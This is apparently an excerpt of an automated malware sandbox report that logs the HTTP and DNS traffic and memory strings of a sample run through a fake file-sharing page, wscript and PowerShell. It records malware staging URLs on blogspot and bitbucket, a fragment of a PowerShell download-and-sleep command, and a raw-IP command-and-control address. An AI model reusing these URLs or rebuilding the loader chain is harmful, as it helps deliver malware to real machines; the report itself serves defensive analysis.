rMEEA+82VqTSxp5S4Z2AlDRHxp+lQqckUeIHXSqFGDCCOlINTA8UTNzWge+SCZusx1SsldNAg3h76g8NeHTUEOnjPAchPVopDAOvDDx18/8Ur4uuNBxyw7U4Ys3+fbxPKUMwx6/AzmnPwdwODM7CsOqxVi9VPARybnX8XOpVXKb6zbNoup/JM1naspRK21/6A7ITLqTjWV+aRzyZh8JUBkgBPvk0freu9NyQ32MLgHgX2WWvjux4JqRD/j+/LY/P8drJzuQIL+4uWRn1er3XKAA5j6xJHKeT39F7peSu6Fjfp4aY3NPO7q7eIfAwc3jfqqeetVw+7hGdI+xCctIaomPZ0LmlwUnwR2cOR7t7j63WNfwCaXtbbl1aJM7/wlAxL5XEw3iq3QXrOBX27my+lXjRxDNgzTPkkW+7U2W/Upq1uLo4S7myY3DEEAaPCFl+u6Y4E+U9mKNrPdPO5XJO6Qmq33Z3eoE988kwQxWyK8gwSyTp6Ih6/IBnleNirUIHXFiyoxge4PAfaIcnhgo04qJTHDsCQtP3oUgFQGwnhEUg2Y/yd8J8Tl2w4Q/9C59flPni3uUTZIvbi3eDVSLMs0/HduYIfQo5Pc7T229q8NAi0p+jPu3wZdYC4wpBjAyxECPZnwIBIyWot+x7LnrLkVDZBAlHG22sJWZ0VGLW3Ng080SoPAJZRE7HAmgPu2t9ykHrlT825s8/2kCVwaiUmLRTf9r9afjv3aFqollFSTapknxhYe6H/Nk/buh0rK7/MXzVr6t7toV3cQI2z8tKPrc6pjK7wKkqaCEU5n+Uy7eTqmWjFH1OF83X/fz4R2Ag9+CROkpg+DY13WSNKzs9vR3EGG+20BJ4oem+Uk7GmOmQl6Rxox20CW3KwlFikAjujU7KdHPZiu2r5DBqwn8FrAb/Z4goMYgbyTLc4d05pA90xS4b7VRqCGZbfh1gWvKTx8N/sDH5fTgzZ+JaDoRj5a9jM1NnC
Source: global traffic	HTTP traffic detected: GET /assets/css/styles.css?v=1.0 HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.securefilepro.com/assets/sfp.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=LoIFFSdIT5S/53Ovnn7IKHJh2GcAAAAAQUIPAAAAAADi2HItZRN1rc6ELxf4wQt7; nlbi_3142003=cOzzUSmEMm3Uey77F8X9dQAAAADzLXg/yYp9grmAKCJER9Jn; incap_ses_1845_3142003=8UhObfxLyDq+Rr4BCcKaGXJh2GcAAAAASwzlWxvJXgODZU9S5bdSgg==; ___utmvc=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
Source: global traffic	HTTP traffic detected: GET /images/landing/send.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/landing/get.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/landing/anytime.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/landing/relax.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/DrakePortals-logo.png HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: objectSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.securefilepro.com/assets/sfp.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=LoIFFSdIT5S/53Ovnn7IKHJh2GcAAAAAQUIPAAAAAADi2HItZRN1rc6ELxf4wQt7; nlbi_3142003=cOzzUSmEMm3Uey77F8X9dQAAAADzLXg/yYp9grmAKCJER9Jn; incap_ses_1845_3142003=8UhObfxLyDq+Rr4BCcKaGXJh2GcAAAAASwzlWxvJXgODZU9S5bdSgg==
Source: global traffic	HTTP traffic detected: GET /images/landing/get.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/landing/anytime.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/landing/relax.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/landing/send.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=LoIFFSdIT5S/53Ovnn7IKHJh2GcAAAAAQUIPAAAAAADi2HItZRN1rc6ELxf4wQt7; nlbi_3142003=cOzzUSmEMm3Uey77F8X9dQAAAADzLXg/yYp9grmAKCJER9Jn; incap_ses_1845_3142003=8UhObfxLyDq+Rr4BCcKaGXJh2GcAAAAASwzlWxvJXgODZU9S5bdSgg==
Source: global traffic	HTTP traffic detected: GET /lundchikha.doc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: marchlkalanew6.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: marchlkalanew6.blogspot.com
Source: global traffic	HTTP traffic detected: GET /!api/2.0/snippets/ansidjaassdasmjkkkkk/Ed7Axy/674fe1eb1b772d5a8f6b913ad0a40c3c7a1d2410/files/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Microsoft-CryptoAPI/10.0Host: x1.i.lencr.org

Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: netlify.app
Source: global traffic	DNS traffic detected: DNS query: tax1099.netlify.app
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.tax1099.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: www.securefilepro.com
Source: global traffic	DNS traffic detected: DNS query: d12bxbf7nz45kt.cloudfront.net
Source: global traffic	DNS traffic detected: DNS query: marchlkalanew6.blogspot.com
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 17:52:53 GMTContent-Type: text/html; charset=utf-8Content-Length: 356Connection: closex-amz-request-id: AYKZ9PDDWNDZ5WF0x-amz-id-2: uewjVvg6oF6b2WOKDhMNgDqOwGHqsLmvex+PMQP0YtsIREdBTWGNNGBlkAAJwvCdZnSrpADbLNA=Content-Security-Policy: default-src * data: filesystem: about: blob: ws: wss:; script-src * 'unsafe-eval' 'unsafe-inline'; style-src * 'unsafe-inline';Set-Cookie: ___utmvc=a; Max-Age=0; path=/; expires=Thu, 06 Mar 2025 07:37:55 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CDN: ImpervaX-Iinfo: 51-108113010-108113082 NNNN CT(5 3 0) RT(1742233973214 210) q(0 0 0 -1) r(0 0) U24

Source: chromecache_225.13.dr	String found in binary or memory: http://alertifyjs.com
Source: chromecache_225.13.dr	String found in binary or memory: http://alertifyjs.com)
Source: wscript.exe, 00000010.00000003.1514314397.000001348F401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: wscript.exe, 00000010.00000003.1514314397.000001348F401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: powershell.exe, 00000011.00000002.2036949117.0000023AC807A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000010.00000003.1514314397.000001348F401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: chromecache_235.13.dr	String found in binary or memory: http://opensource.org/licenses/MIT).
Source: powershell.exe, 00000011.00000002.2021948691.0000023AB8227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.2021948691.0000023AB83F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000011.00000002.2021948691.0000023AB8001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.2021948691.0000023AB83F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: chromecache_231.13.dr	String found in binary or memory: http://stuartk.com/jszip
Source: powershell.exe, 00000011.00000002.2021948691.0000023AB8227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000011.00000002.2532186545.0000023AD0562000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000011.00000002.2532186545.0000023AD048D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://.Exte1
Source: fontdrvhost.exe, fontdrvhost.exe, 00000025.00000002.1942571963.0000025AD4150000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15p
Source: fontdrvhost.exe, 00000021.00000002.1899968961.0000000005144000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000025.00000002.1942571963.0000025AD4150000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15pkernelbasentdllkernel32GetProcessMitigatio
Source: fontdrvhost.exe, 00000020.00000002.1776041210.0000000002EDD000.00000004.00000010.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000002.1889395265.00000000004EC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15px
Source: powershell.exe, 00000011.00000002.2021948691.0000023AB8001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000011.00000002.2021948691.0000023AB83F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000011.00000002.2021948691.0000023AB83DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: powershell.exe, 00000011.00000002.2021948691.0000023AB83B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2021948691.0000023AB83A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/
Source: chromecache_219.13.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
Source: fontdrvhost.exe, 00000021.00000003.1857376404.0000000004B89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudflare-dns.com/dns-query
Source: fontdrvhost.exe, 00000021.00000003.1857376404.0000000004B89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
Source: powershell.exe, 00000011.00000002.2036949117.0000023AC807A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2036949117.0000023AC807A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2036949117.0000023AC807A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: chromecache_219.13.dr	String found in binary or memory: https://fonts.gstatic.com
Source: chromecache_219.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/materialicons/v143/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2)
Source: chromecache_219.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/materialiconsoutlined/v109/gok-H7zzDkdnRel8-DQ6KAXJ69wP1tGnf4ZGhUce.woff
Source: chromecache_219.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/materialiconsround/v108/LDItaoyNOAY6Uewc665JcIzCKsKc_M9flwmP.woff2)
Source: chromecache_219.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/materialiconssharp/v109/oPWQ_lt5nv4pWNJpghLP75WiFR4kLh3kvmvR.woff2)
Source: chromecache_219.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/materialiconstwotone/v112/hESh6WRmNCxEqUmNyh3JDeGxjVVyMg4tHGctNCu0.woff2
Source: chromecache_213.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVI
Source: chromecache_213.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4iaVI
Source: chromecache_213.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4jaVI
Source: chromecache_213.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4kaVI
Source: chromecache_213.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4saVI
Source: chromecache_213.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4taVI
Source: chromecache_213.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVI
Source: chromecache_213.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4vaVI
Source: chromecache_213.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B5OaVI
Source: chromecache_213.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B5caVI
Source: powershell.exe, 00000011.00000002.2021948691.0000023AB8227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: chromecache_231.13.dr	String found in binary or memory: https://github.com/nodeca/pako/blob/main/LICENSE
Source: powershell.exe, 00000011.00000002.2020294307.0000023AB6374000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2018360550.0000023AB6183000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kalacpamarchclean.blogspot.com/chig.doc)
Source: wscript.exe, 00000010.00000002.1604297870.000001348F660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marchlkalanew6.blog
Source: powershell.exe, 00000011.00000002.2021948691.0000023AB8227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://marchlkalanew6.blogspot.com
Source: powershell.exe, 00000011.00000002.2021948691.0000023AB8227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc
Source: wscript.exe, 00000010.00000003.1601351766.000001348D729000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Slee
Source: powershell.exe, 00000011.00000002.2018360550.0000023AB6148000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep
Source: powershell.exe, 00000011.00000002.2020927094.0000023AB7BA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;
Source: powershell.exe, 00000011.00000002.2527101862.0000023AD0156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;?M
Source: powershell.exe, 00000011.00000002.2020294307.0000023AB6370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;Y
Source: powershell.exe, 00000011.00000002.2018360550.0000023AB6148000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;jM
Source: powershell.exe, 00000011.00000002.2018360550.0000023AB6140000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;mM
Source: powershell.exe, 00000011.00000002.2018360550.0000023AB6148000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-SleepzR
Source: powershell.exe, 00000011.00000002.2036949117.0000023AC807A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: chromecache_225.13.dr	String found in binary or memory: https://opensource.org/licenses/gpl-3.0
Source: chromecache_231.13.dr	String found in binary or memory: https://raw.github.com/Stuk/jszip/main/LICENSE.markdown.
Source: wscript.exe, 00000010.00000003.1514314397.000001348F401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: chromecache_226.13.dr, chromecache_224.13.dr, chromecache_227.13.dr, chromecache_229.13.dr, chromecache_221.13.dr, chromecache_236.13.dr	String found in binary or memory: https://sketch.com

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
